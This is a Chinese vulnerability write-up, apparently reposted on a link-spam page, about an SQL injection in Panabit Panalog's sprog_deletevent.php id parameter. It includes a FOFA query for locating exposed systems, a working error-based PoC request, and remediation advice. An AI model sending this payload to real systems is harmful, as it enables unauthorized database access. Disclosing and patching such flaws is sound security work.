当前位置: 首页 > news >正文

山西网站建设公司商城网站系统建设

山西网站建设公司,商城网站系统建设,justnews主题wordpress,地产项目网站建设ppt0x01 产品简介 Panalog大数据日志审计系统定位于将大数据产品应用于高校、 公安、 政企、 医疗、 金融、 能源等行业之中,针对网络流量的信息进行日志留存,可对用户上网行为进行审计,逐渐形成大数据采集、 大数据分析、 大数据整合的工作模式…

0x01 产品简介

Panalog大数据日志审计系统定位于将大数据产品应用于高校、 公安、 政企、 医疗、 金融、 能源等行业之中,针对网络流量的信息进行日志留存,可对用户上网行为进行审计,逐渐形成大数据采集、 大数据分析、 大数据整合的工作模式,为各种网络用户提供服务。

0x02 漏洞概述

Panabit /Maintain/sprog_deletevent.php 文件的 id 参数存在 SQL 注入漏洞,可导致数据库信息泄露从而获取敏感信息,甚至可能被攻击者进一步利用造成更大危害。

0x03 复现环境

FOFA:app="Panabit-Panalog" && port="8012"

0x04 漏洞复现 

PoC

GET /Maintain/sprog_deletevent.php?openid=1&id=1%20or%20updatexml(1,concat(0x7e,(select+version%28%29)),0)&cloudip=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

查询数据库版本

0x05 修复建议 

对传入的 sql 语句进行预编译处理。

部署Web应用防火墙,对数据库操作进行监控。

如非必要,禁止公网访问该系统。

http://www.yayakq.cn/news/718440/

相关文章:

  • qt做网站虚拟体验网站
  • 网站建设问题小程序优点
  • 烟台网站开发多少钱深圳设计网站有哪些
  • 微网站怎么用做网站推广电话
  • js实现网站简体转繁体网站开发多少钱一天是
  • 可信网站认证申请毕业生登记表自我鉴定模板
  • 三站合一的网站怎么做php网站开发需要多久
  • 路由器做网站服务器wordpress迁移主机后主页不显示
  • 聊城做网站的公司案例网站建设需注意的问题
  • 中建招聘官网入口seo搜索优化网站推广排名
  • 买好域名和云主机后怎么做网站福建省建设行业企业资质查询网站
  • 做3d图的网站有哪些软件做网站网站是什么案件
  • 北京网站开发哪家强网站建设电话销售话术技巧
  • 做网站公司天津做网站时怎么裁切存图
  • 做外贸都有哪些网站微网站设计平台
  • 东台市建设局网站运城盐湖区姚孟信通网站开发中心
  • 微信商城网站怎么做注册网站发财的富豪
  • 郑州网站建设联系方式承接php网站建设
  • 网站小程序app开发网站前台图片设置
  • 大连网络推广网站优化找哪家好王占山事迹
  • 郑州网站建设易云巢网络运营者不得泄露
  • 朔州企业网站建设公司注册网站系统
  • 工信部网站原来是泰州网站建设
  • 漳州找人做网站要求哪些网站建设常用的6大布局加代码
  • 网站开发管理计算机培训班价格
  • 做网站的人多吗2020长沙马拉松线上赛
  • 广州做手机网站咨询太仓市住房城乡建设局网站
  • c2c网站网址织梦网站修改教程视频
  • 靖江网站建设制作网站是如何设计配置方案的
  • 有什么好的网站做旅行计划万表网欧米茄